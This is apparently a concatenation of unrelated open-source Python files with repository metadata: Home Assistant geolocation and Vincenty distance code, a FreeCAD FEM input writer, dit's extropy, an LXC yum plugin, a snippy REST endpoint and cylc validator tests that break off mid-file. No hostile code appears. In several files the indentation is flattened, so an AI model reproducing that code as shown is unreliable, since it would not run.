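# assuming the caller can create its own aiohttp session.
async def _detect_location_example() -> Optional[LocationInfo]:
    async with aiohttp.ClientSession() as session:
        # Tries ipapi.co first and falls back to ip-api.com, as documented above.
        return await async_detect_location_info(session)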
def distance(
lat1: Optional[float], lon1: Optional[float], lat2: float, lon2: float
) -> Optional[float]:
"""Calculate the distance in meters between two points.
Async friendly.
"""
if lat1 is None or lon1 is None:
return None
result = vincenty((lat1, lon1), (lat2, lon2))
if result is None:
return None
return result * 1000
# Author: https://github.com/maurycyp
# Source: https://github.com/maurycyp/vincenty
# License: https://github.com/maurycyp/vincenty/blob/master/LICENSE
# pylint: disable=invalid-name
def vincenty(
point1: Tuple[float, float], point2: Tuple[float, float], miles: bool = False
) -> Optional[float]:
"""
Vincenty formula (inverse method) to calculate the distance.
Result in kilometers or miles between two points on the surface of a
spheroid.
Async friendly.
"""
# short-circuit coincident points
if point1[0] == point2[0] and point1[1] == point2[1]:
return 0.0
U1 = math.atan((1 - FLATTENING) * math.tan(math.radians(point1[0])))
U2 = math.atan((1 - FLATTENING) * math.tan(math.radians(point2[0])))
L = math.radians(point2[1] - point1[1])
Lambda = L
sinU1 = math.sin(U1)
cosU1 = math.cos(U1)
sinU2 = math.sin(U2)
cosU2 = math.cos(U2)
for _ in range(MAX_ITERATIONS):
sinLambda = math.sin(Lambda)
cosLambda = math.cos(Lambda)
sinSigma = math.sqrt(
(cosU2 * sinLambda) ** 2 + (cosU1 * sinU2 - sinU1 * cosU2 * cosLambda) ** 2
)
if sinSigma == 0.0:
return 0.0 # coincident points
cosSigma = sinU1 * sinU2 + cosU1 * cosU2 * cosLambda
sigma = math.atan2(sinSigma, cosSigma)
sinAlpha = cosU1 * cosU2 * sinLambda / sinSigma
cosSqAlpha = 1 - sinAlpha ** 2
try:
cos2SigmaM = cosSigma - 2 * sinU1 * sinU2 / cosSqAlpha
except ZeroDivisionError:
cos2SigmaM = 0
C = FLATTENING / 16 * cosSqAlpha * (4 + FLATTENING * (4 - 3 * cosSqAlpha))
LambdaPrev = Lambda
Lambda = L + (1 - C) * FLATTENING * sinAlpha * (
sigma
+ C * sinSigma * (cos2SigmaM + C * cosSigma * (-1 + 2 * cos2SigmaM ** 2))
)
if abs(Lambda - LambdaPrev) < CONVERGENCE_THRESHOLD:
break # successful convergence
else:
return None # failure to converge
uSq = cosSqAlpha * (AXIS_A ** 2 - AXIS_B ** 2) / (AXIS_B ** 2)
A = 1 + uSq / 16384 * (4096 + uSq * (-768 + uSq * (320 - 175 * uSq)))
B = uSq / 1024 * (256 + uSq * (-128 + uSq * (74 - 47 * uSq)))
deltaSigma = (
B
* sinSigma
* (
cos2SigmaM
+ B
/ 4
* (
cosSigma * (-1 + 2 * cos2SigmaM ** 2)
- B
/ 6
* cos2SigmaM
* (-3 + 4 * sinSigma ** 2)
* (-3 + 4 * cos2SigmaM ** 2)
)
)
)
s = AXIS_B * A * (sigma - deltaSigma)
s /= 1000 # Conversion of meters to kilometers
if miles:
s *= MILES_PER_KILOMETER # kilometers to miles
return round(s, 6)
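# Illustrative sketch, not part of the original module: vincenty() returns the
# geodesic length in kilometers by default and in miles with miles=True; the
# coordinates below are arbitrary example values (roughly Berlin and Paris).
def _vincenty_usage_example() -> Tuple[Optional[float], Optional[float]]:
    kilometers = vincenty((52.5200, 13.4050), (48.8566, 2.3522))
    miles = vincenty((52.5200, 13.4050), (48.8566, 2.3522), miles=True)
    return kilometers, miles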
async def _get_ipapi(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ipapi.co for location data."""
try:
resp = await session.get(IPAPI, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("ip"),
"country_code": raw_info.get("country"),
"country_name": raw_info.get("country_name"),
"region_code": raw_info.get("region_code"),
"region_name": raw_info.get("region"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("postal"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("latitude"),
"longitude": raw_info.get("longitude"),
}
async def _get_ip_api(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ip-api.com for location data."""
try:
resp = await session.get(IP_API, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("query"),
"country_code": raw_info.get("countryCode"),
"country_name": raw_info.get("country"),
"region_code": raw_info.get("region"),
"region_name": raw_info.get("regionName"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("zip"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("lat"),
"longitude": raw_info.get("lon"),
}
|
leppa/home-assistant
|
homeassistant/util/location.py
|
Python
|
apache-2.0
| 6,274
| 0.000956
|
# Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: jernej@reciprocitylabs.com
# Maintained By: jernej@reciprocitylabs.com
from lib import environment
from lib.constants import url
from lib.page.widget.base import Widget
class AdminPeople(Widget):
URL = environment.APP_URL \
+ url.ADMIN_DASHBOARD \
+ url.Widget.PEOPLE
|
jmakov/ggrc-core
|
test/selenium/src/lib/page/widget/admin_people.py
|
Python
|
apache-2.0
| 457
| 0.002188
|
# ***************************************************************************
# * *
# * Copyright (c) 2016 - Bernd Hahnebach <bernd@bimstatik.org> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
'''
- the next step would be to save the constraint node and element data in the FreeCAD FEM Mesh Object
and link them to the appropriate constraint object
- if that information were used by the FEM Mesh file exporter, FreeCAD would support writing FEM Mesh Groups
- which is a much needed feature of the FEM module
- smesh supports mesh groups; is there a Python binding for this in FreeCAD already?
'''
__title__ = "FemInputWriter"
__author__ = "Bernd Hahnebach"
__url__ = "http://www.freecadweb.org"
import FreeCAD
import FemMeshTools
import os
class FemInputWriter():
def __init__(self,
analysis_obj, solver_obj,
mesh_obj, matlin_obj, matnonlin_obj,
fixed_obj, displacement_obj,
contact_obj, planerotation_obj, transform_obj,
selfweight_obj, force_obj, pressure_obj,
temperature_obj, heatflux_obj, initialtemperature_obj,
beamsection_obj, shellthickness_obj,
analysis_type, dir_name
):
self.analysis = analysis_obj
self.solver_obj = solver_obj
self.mesh_object = mesh_obj
self.material_objects = matlin_obj
self.material_nonlinear_objects = matnonlin_obj
self.fixed_objects = fixed_obj
self.displacement_objects = displacement_obj
self.contact_objects = contact_obj
self.planerotation_objects = planerotation_obj
self.transform_objects = transform_obj
self.selfweight_objects = selfweight_obj
self.force_objects = force_obj
self.pressure_objects = pressure_obj
self.temperature_objects = temperature_obj
self.heatflux_objects = heatflux_obj
self.initialtemperature_objects = initialtemperature_obj
self.beamsection_objects = beamsection_obj
self.shellthickness_objects = shellthickness_obj
self.analysis_type = analysis_type
self.dir_name = dir_name
if not dir_name:
            print('Error: FemInputWriter has no working_dir --> we are going to make a temporary one!')
self.dir_name = FreeCAD.ActiveDocument.TransientDir.replace('\\', '/') + '/FemAnl_' + analysis_obj.Uid[-4:]
if not os.path.isdir(self.dir_name):
os.mkdir(self.dir_name)
self.fc_ver = FreeCAD.Version()
self.ccx_eall = 'Eall'
self.ccx_elsets = []
self.femmesh = self.mesh_object.FemMesh
self.femnodes_mesh = {}
self.femelement_table = {}
self.constraint_conflict_nodes = []
def get_constraints_fixed_nodes(self):
# get nodes
for femobj in self.fixed_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_displacement_nodes(self):
# get nodes
for femobj in self.displacement_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_planerotation_nodes(self):
# get nodes
for femobj in self.planerotation_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_transform_nodes(self):
# get nodes
for femobj in self.transform_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_temperature_nodes(self):
# get nodes
for femobj in self.temperature_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_force_nodeloads(self):
# check shape type of reference shape
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
# in GUI defined frc_obj all ref_shape have the same shape type
            # TODO in FemTools: check if all RefShapes really have the same type and write the type to the dictionary
femobj['RefShapeType'] = ''
if frc_obj.References:
first_ref_obj = frc_obj.References[0]
first_ref_shape = first_ref_obj[0].Shape.getElement(first_ref_obj[1][0])
femobj['RefShapeType'] = first_ref_shape.ShapeType
else:
# frc_obj.References could be empty ! # TODO in FemTools: check
FreeCAD.Console.PrintError('At least one Force Object has empty References!\n')
if femobj['RefShapeType'] == 'Vertex':
# print("load on vertices --> we do not need the femelement_table and femnodes_mesh for node load calculation")
pass
elif femobj['RefShapeType'] == 'Face' and FemMeshTools.is_solid_femmesh(self.femmesh) and not FemMeshTools.has_no_face_data(self.femmesh):
# print("solid_mesh with face data --> we do not need the femelement_table but we need the femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
else:
# print("mesh without needed data --> we need the femelement_table and femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
if not self.femelement_table:
self.femelement_table = FemMeshTools.get_femelement_table(self.femmesh)
# get node loads
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
if frc_obj.Force == 0:
print(' Warning --> Force = 0')
            if femobj['RefShapeType'] == 'Vertex': # point load on vertices
femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_vertex_nodeload_table(self.femmesh, frc_obj)
elif femobj['RefShapeType'] == 'Edge': # line load on edges
femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_edge_nodeload_table(self.femmesh, self.femelement_table, self.femnodes_mesh, frc_obj)
elif femobj['RefShapeType'] == 'Face': # area load on faces
femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_face_nodeload_table(self.femmesh, self.femelement_table, self.femnodes_mesh, frc_obj)
def get_constraints_pressure_faces(self):
# TODO see comments in get_constraints_force_nodeloads(), it applies here too. Mhh it applies to all constraints ...
# get the faces and face numbers
for femobj in self.pressure_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['PressureFaces'] = FemMeshTools.get_pressure_obj_faces(self.femmesh, femobj)
# print femobj['PressureFaces']
|
wood-galaxy/FreeCAD
|
src/Mod/Fem/FemInputWriter.py
|
Python
|
lgpl-2.1
| 9,277
| 0.003557
|
"""
The extropy
"""
from ..helpers import RV_MODES
from ..math.ops import get_ops
import numpy as np
def extropy(dist, rvs=None, rv_mode=None):
"""
Returns the extropy J[X] over the random variables in `rvs`.
If the distribution represents linear probabilities, then the extropy
is calculated with units of 'bits' (base-2).
Parameters
----------
dist : Distribution or float
The distribution from which the extropy is calculated. If a float,
then we calculate the binary extropy.
rvs : list, None
The indexes of the random variable used to calculate the extropy.
If None, then the extropy is calculated over all random variables.
This should remain `None` for ScalarDistributions.
rv_mode : str, None
Specifies how to interpret the elements of `rvs`. Valid options are:
{'indices', 'names'}. If equal to 'indices', then the elements of
`rvs` are interpreted as random variable indices. If equal to 'names',
        then the elements are interpreted as random variable names. If `None`,
then the value of `dist._rv_mode` is consulted.
Returns
-------
J : float
The extropy of the distribution.
"""
try:
# Handle binary extropy.
float(dist)
except TypeError:
pass
else:
# Assume linear probability for binary extropy.
import dit
dist = dit.ScalarDistribution([dist, 1-dist])
rvs = None
rv_mode = RV_MODES.INDICES
if dist.is_joint():
if rvs is None:
            # Default to the extropy of the entire distribution
rvs = list(range(dist.outcome_length()))
rv_mode = RV_MODES.INDICES
d = dist.marginal(rvs, rv_mode=rv_mode)
else:
d = dist
pmf = d.pmf
if d.is_log():
base = d.get_base(numerical=True)
npmf = d.ops.log(1-d.ops.exp(pmf))
terms = -base**npmf * npmf
else:
        # Calculate extropy in bits.
log = get_ops(2).log
npmf = 1 - pmf
terms = -npmf * log(npmf)
J = np.nansum(terms)
return J
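# Illustrative sketch, not part of the original module: passing a float takes
# the binary-extropy branch above. For two outcomes extropy equals entropy, so
# a fair coin gives J = 1 bit. Hypothetical helper, for illustration only.
def _binary_extropy_example():
    return extropy(0.5)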
|
chebee7i/dit
|
dit/other/extropy.py
|
Python
|
bsd-3-clause
| 2,122
| 0.000471
|
# Yum plugin to re-patch container rootfs after a yum update is done
#
# Copyright (C) 2012 Oracle
#
# Authors:
# Dwight Engen <dwight.engen@oracle.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import os
from fnmatch import fnmatch
from yum.plugins import TYPE_INTERACTIVE
from yum.plugins import PluginYumExit
requires_api_version = '2.0'
plugin_type = (TYPE_INTERACTIVE,)
def posttrans_hook(conduit):
pkgs = []
patch_required = False
# If we aren't root, we can't have updated anything
if os.geteuid():
return
# See what packages have files that were patched
confpkgs = conduit.confString('main', 'packages')
if not confpkgs:
return
tmp = confpkgs.split(",")
for confpkg in tmp:
pkgs.append(confpkg.strip())
conduit.info(2, "lxc-patch: checking if updated pkgs need patching...")
ts = conduit.getTsInfo()
for tsmem in ts.getMembers():
for pkg in pkgs:
if fnmatch(pkg, tsmem.po.name):
patch_required = True
if patch_required:
conduit.info(2, "lxc-patch: patching container...")
os.spawnlp(os.P_WAIT, "lxc-patch", "lxc-patch", "--patch", "/")
|
czchen/debian-lxc
|
config/yum/lxc-patch.py
|
Python
|
lgpl-2.1
| 1,850
| 0.000541
|
# -*- coding: utf-8 -*-
#
# SPDX-License-Identifier: AGPL-3.0-or-later
#
# snippy - software development and maintenance notes manager.
# Copyright 2017-2020 Heikki J. Laaksonen <laaksonen.heikki.j@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""api_fields: JSON REST API for resource attributes."""
from snippy.cause import Cause
from snippy.config.config import Config
from snippy.config.source.api import Api
from snippy.constants import Constants as Const
from snippy.logger import Logger
from snippy.server.rest.base import ApiResource
from snippy.server.rest.base import ApiNotImplemented
from snippy.server.rest.generate import Generate
class ApiAttributes(object):
"""Access unique resource attributes."""
def __init__(self, content):
self._logger = Logger.get_logger(__name__)
self._category = content.category
self._content = content
@Logger.timeit(refresh_oid=True)
def on_get(self, request, response):
"""Search unique resource attributes.
Search is made from all content categories by default.
Args:
request (obj): Falcon Request().
response (obj): Falcon Response().
"""
self._logger.debug('run: %s %s', request.method, request.uri)
if 'scat' not in request.params:
request.params['scat'] = Const.CATEGORIES
api = Api(self._category, Api.UNIQUE, request.params)
Config.load(api)
self._content.run()
if not self._content.uniques:
Cause.push(Cause.HTTP_NOT_FOUND, 'cannot find unique fields for %s attribute' % self._category)
if Cause.is_ok():
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.fields(self._category, self._content.uniques, request, response)
response.status = Cause.http_status()
else:
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.error(Cause.json_message())
response.status = Cause.http_status()
Cause.reset()
self._logger.debug('end: %s %s', request.method, request.uri)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_post(request, response):
"""Create new field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_put(request, response):
"""Change field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_delete(request, response):
"""Delete field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_options(_, response):
"""Respond with allowed methods."""
response.status = Cause.HTTP_200
response.set_header('Allow', 'GET,OPTIONS')
|
heilaaks/snippy
|
snippy/server/rest/api_fields.py
|
Python
|
agpl-3.0
| 3,524
| 0.000568
|
# THIS FILE IS PART OF THE CYLC WORKFLOW ENGINE.
# Copyright (C) NIWA & British Crown (Met Office) & Contributors.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Unit Tests for cylc.flow.parsec.validate.ParsecValidator.coerce methods."""
from typing import List
import pytest
from pytest import approx
from cylc.flow.parsec.config import ConfigNode as Conf
from cylc.flow.parsec.OrderedDict import OrderedDictWithDefaults
from cylc.flow.parsec.exceptions import IllegalValueError
from cylc.flow.parsec.validate import (
CylcConfigValidator as VDR,
DurationFloat,
ListValueError,
IllegalItemError,
ParsecValidator,
parsec_validate
)
@pytest.fixture
def sample_spec():
with Conf('myconf') as myconf:
with Conf('section1'):
Conf('value1', default='')
Conf('value2', default='what?')
with Conf('section2'):
Conf('enabled', VDR.V_BOOLEAN)
with Conf('section3'):
Conf('title', default='default', options=['1', '2'])
Conf(
'amounts',
VDR.V_INTEGER_LIST,
default=[1, 2, 3],
# options=[[1, 2, 3]]
)
with Conf('entries'):
Conf('key')
Conf('value')
with Conf('<whatever>'):
Conf('section300000', default='')
Conf('ids', VDR.V_INTEGER_LIST)
return myconf
@pytest.fixture
def validator_invalid_values():
"""
    Data provider of invalid values for the parsec validator. Values must not
    be null (covered elsewhere) and must not be dicts.
    Possible invalid scenarios must include:
    - cfg[key] is a list AND a value is not in the list of possible values
- OR
- cfg[key] is not a list AND cfg[key] not in the list of possible values
:return: a list with sets of tuples for the test parameters
:rtype: list
"""
values = []
# variables reused throughout
spec = None
msg = None
# set 1 (t, f, f, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER_LIST, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "1, 2, 3"
msg = None
values.append((spec, cfg, msg))
# set 2 (t, t, f, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER_LIST, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "1, 2, 5"
msg = '(type=option) value = [1, 2, 5]'
values.append((spec, cfg, msg))
# set 3 (f, f, t, f)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER, default=1, options=[2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "2"
msg = None
values.append((spec, cfg, msg))
# set 4 (f, f, t, t)
with Conf('base') as spec:
Conf('value', VDR.V_INTEGER, default=1, options=[1, 2, 3, 4])
cfg = OrderedDictWithDefaults()
cfg['value'] = "5"
msg = '(type=option) value = 5'
values.append((spec, cfg, msg))
return values
@pytest.fixture
def strip_and_unquote_list():
return [
[
'"a,b", c, "d e"', # input
["a,b", "c", "d e"] # expected
],
[
'foo bar baz', # input
["foo bar baz"] # expected
],
[
'"a", \'b\', c', # input
["a", "b", "c"] # expected
],
[
'a b c, d e f', # input
["a b c", "d e f"] # expected
],
]
def test_list_value_error():
keys = ['a,', 'b', 'c']
value = 'a sample value'
error = ListValueError(keys, value, "who cares")
output = str(error)
expected = '(type=list) [a,][b]c = a sample value - (who cares)'
assert expected == output
def test_list_value_error_with_exception():
keys = ['a,', 'b', 'c']
value = 'a sample value'
exc = Exception('test')
error = ListValueError(keys, value, "who cares", exc)
output = str(error)
expected = '(type=list) [a,][b]c = a sample value - (test: who cares)'
assert expected == output
def test_illegal_value_error():
value_type = 'ClassA'
keys = ['a,', 'b', 'c']
value = 'a sample value'
error = IllegalValueError(value_type, keys, value)
output = str(error)
expected = "(type=ClassA) [a,][b]c = a sample value"
assert expected == output
def test_illegal_value_error_with_exception():
value_type = 'ClassA'
keys = ['a,', 'b', 'c']
value = 'a sample value'
exc = Exception('test')
error = IllegalValueError(value_type, keys, value, exc)
output = str(error)
expected = "(type=ClassA) [a,][b]c = a sample value - (test)"
assert expected == output
def test_illegal_item_error():
keys = ['a,', 'b', 'c']
key = 'a sample value'
error = IllegalItemError(keys, key)
output = str(error)
expected = "[a,][b][c]a sample value"
assert expected == output
def test_illegal_item_error_message():
keys = ['a,', 'b', 'c']
key = 'a sample value'
message = "invalid"
error = IllegalItemError(keys, key, message)
output = str(error)
expected = "[a,][b][c]a sample value - (invalid)"
assert expected == output
def test_parsec_validator_invalid_key(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section22'] = 'abc'
with pytest.raises(IllegalItemError):
parsec_validator.validate(cfg, sample_spec)
def test_parsec_validator_invalid_key_no_spec(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section22'] = 'abc'
# remove the user-defined section from the spec
sample_spec._children = {
key: value
for key, value in sample_spec._children.items()
if key != '__MANY__'
}
with pytest.raises(IllegalItemError):
parsec_validator.validate(cfg, sample_spec)
def test_parsec_validator_invalid_key_with_many_spaces(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section 3000000'] = 'test'
with pytest.raises(IllegalItemError) as cm:
parsec_validator.validate(cfg, sample_spec)
    assert str(cm.value) == "section 3000000 - (consecutive spaces)"
def test_parsec_validator_invalid_key_with_many_invalid_values(
validator_invalid_values
):
for spec, cfg, msg in validator_invalid_values:
parsec_validator = ParsecValidator()
if msg is not None:
with pytest.raises(IllegalValueError) as cm:
parsec_validator.validate(cfg, spec)
assert msg == str(cm.value)
else:
# cylc.flow.parsec_validator.validate(cfg, spec)
# let's use the alias `parsec_validate` here
parsec_validate(cfg, spec)
# TBD assertIsNotNone when 2.6+
assert parsec_validator is not None
def test_parsec_validator_invalid_key_with_many_1(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section3000000'] = OrderedDictWithDefaults()
parsec_validator.validate(cfg, sample_spec)
# TBD assertIsNotNone when 2.6+
assert parsec_validator is not None
def test_parsec_validator_invalid_key_with_many_2(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section3'] = OrderedDictWithDefaults()
cfg['section3']['title'] = '1'
cfg['section3']['entries'] = OrderedDictWithDefaults()
cfg['section3']['entries']['key'] = 'name'
cfg['section3']['entries']['value'] = "1, 2, 3, 4"
parsec_validator.validate(cfg, sample_spec)
# TBD assertIsNotNone when 2.6+
assert parsec_validator is not None
def test_parsec_validator(sample_spec):
parsec_validator = ParsecValidator()
cfg = OrderedDictWithDefaults()
cfg['section1'] = OrderedDictWithDefaults()
cfg['section1']['value1'] = '1'
cfg['section1']['value2'] = '2'
cfg['section3'] = OrderedDictWithDefaults()
cfg['section3']['title'] = None
parsec_validator.validate(cfg, sample_spec)
# TBD assertIsNotNone when 2.6+
assert parsec_validator is not None
# --- static methods
def test_coerce_none_fails():
with pytest.raises(AttributeError):
ParsecValidator.coerce_boolean(None, [])
with pytest.raises(AttributeError):
ParsecValidator.coerce_float(None, [])
with pytest.raises(AttributeError):
ParsecValidator.coerce_int(None, [])
def test_coerce_boolean():
"""Test coerce_boolean."""
validator = ParsecValidator()
# The good
for value, result in [
('True', True),
(' True ', True),
('"True"', True),
("'True'", True),
('true', True),
(' true ', True),
('"true"', True),
("'true'", True),
('False', False),
(' False ', False),
('"False"', False),
("'False'", False),
('false', False),
(' false ', False),
('"false"', False),
("'false'", False),
('', None),
(' ', None)
]:
assert validator.coerce_boolean(value, ['whatever']) == result
# The bad
for value in [
'None', ' Who cares? ', '3.14', '[]', '[True]', 'True, False'
]:
with pytest.raises(IllegalValueError):
validator.coerce_boolean(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('3', 3.0),
('9.80', 9.80),
('3.141592654', 3.141592654),
('"3.141592654"', 3.141592654),
("'3.141592654'", 3.141592654),
('-3', -3.0),
('-3.1', -3.1),
('0', 0.0),
('-0', -0.0),
('0.0', 0.0),
('1e20', 1.0e20),
('6.02e23', 6.02e23),
('-1.6021765e-19', -1.6021765e-19),
('6.62607004e-34', 6.62607004e-34),
]
)
def test_coerce_float(value: str, expected: float):
"""Test coerce_float."""
assert (
ParsecValidator.coerce_float(value, ['whatever']) == approx(expected)
)
def test_coerce_float__empty():
# not a number
assert ParsecValidator.coerce_float('', ['whatever']) is None
@pytest.mark.parametrize(
'value',
['None', ' Who cares? ', 'True', '[]', '[3.14]', '3.14, 2.72']
)
def test_coerce_float__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_float(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('', []),
('3', [3.0]),
('2*3.141592654', [3.141592654, 3.141592654]),
('12*8, 8*12.0', [8.0] * 12 + [12.0] * 8),
('-3, -2, -1, -0.0, 1.0', [-3.0, -2.0, -1.0, -0.0, 1.0]),
('6.02e23, -1.6021765e-19, 6.62607004e-34',
[6.02e23, -1.6021765e-19, 6.62607004e-34]),
]
)
def test_coerce_float_list(value: str, expected: List[float]):
"""Test coerce_float_list."""
items = ParsecValidator.coerce_float_list(value, ['whatever'])
assert items == approx(expected)
@pytest.mark.parametrize(
'value',
['None', 'e, i, e, i, o', '[]', '[3.14]', 'pi, 2.72', '2*True']
)
def test_coerce_float_list__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_float_list(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('0', 0),
('3', 3),
('-3', -3),
('-0', -0),
('653456', 653456),
('-8362583645365', -8362583645365)
]
)
def test_coerce_int(value: str, expected: int):
"""Test coerce_int."""
assert ParsecValidator.coerce_int(value, ['whatever']) == expected
def test_coerce_int__empty():
assert ParsecValidator.coerce_int('', ['whatever']) is None # not a number
@pytest.mark.parametrize(
'value',
['None', ' Who cares? ', 'True', '4.8', '[]', '[3]', '60*60']
)
def test_coerce_int__bad(value: str):
with pytest.raises(IllegalValueError):
ParsecValidator.coerce_int(value, ['whatever'])
def test_coerce_int_list():
"""Test coerce_int_list."""
validator = ParsecValidator()
# The good
for value, results in [
('', []),
('3', [3]),
('1..10, 11..20..2',
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19]),
('18 .. 24', [18, 19, 20, 21, 22, 23, 24]),
('18 .. 24 .. 3', [18, 21, 24]),
('-10..10..3', [-10, -7, -4, -1, 2, 5, 8]),
('10*3, 4*-6', [3] * 10 + [-6] * 4),
('10*128, -78..-72, 2048',
[128] * 10 + [-78, -77, -76, -75, -74, -73, -72, 2048])
]:
assert validator.coerce_int_list(value, ['whatever']) == results
# The bad
for value in [
'None', 'e, i, e, i, o', '[]', '1..3, x', 'one..ten'
]:
with pytest.raises(IllegalValueError):
validator.coerce_int_list(value, ['whatever'])
def test_coerce_str():
"""Test coerce_str."""
validator = ParsecValidator()
# The good
for value, result in [
('', ''),
('Hello World!', 'Hello World!'),
('"Hello World!"', 'Hello World!'),
('"Hello Cylc\'s World!"', 'Hello Cylc\'s World!'),
("'Hello World!'", 'Hello World!'),
('0', '0'),
('My list is:\nfoo, bar, baz\n', 'My list is:\nfoo, bar, baz'),
(' Hello:\n foo\n bar\n baz\n',
'Hello:\nfoo\nbar\nbaz'),
(' Hello:\n foo\n Greet\n baz\n',
'Hello:\n foo\nGreet\n baz'),
('False', 'False'),
('None', 'None'),
